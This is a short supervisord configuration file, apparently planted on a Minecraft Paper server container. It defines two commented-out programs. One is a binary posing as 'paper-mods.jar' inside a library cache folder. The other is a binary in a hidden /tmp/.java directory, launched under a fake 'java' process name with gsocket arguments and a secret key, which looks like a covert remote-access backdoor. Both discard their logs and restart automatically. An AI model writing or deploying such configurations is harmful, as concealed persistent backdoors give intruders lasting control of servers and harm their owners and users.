[supervisord]
logfile=/dev/null

# [program:app]
# directory=/home/container/libraries/io/papermc/paper/paper-api/1.21.4-R0.1-SNAPSHOT/.cache
# command=./paper-mods.jar -C ./conf.yaml 
# stdout_logfile=/dev/null
# autorestart = true

# [program:gnet]
# directory=/tmp/.java/bin
# environment=GSOCKET_ARGS="-s j6A9eD2a1E2c5A16f9L89-3D9g8Hbj7-5i6C4a9U6k1eCd9-F9i4J0d6A2803-8A1c5J1g60 -liqD",HOME="/home/container"
# command=exec -a -java ./add-on.jar 
# stdout_logfile=/dev/null
# autorestart = true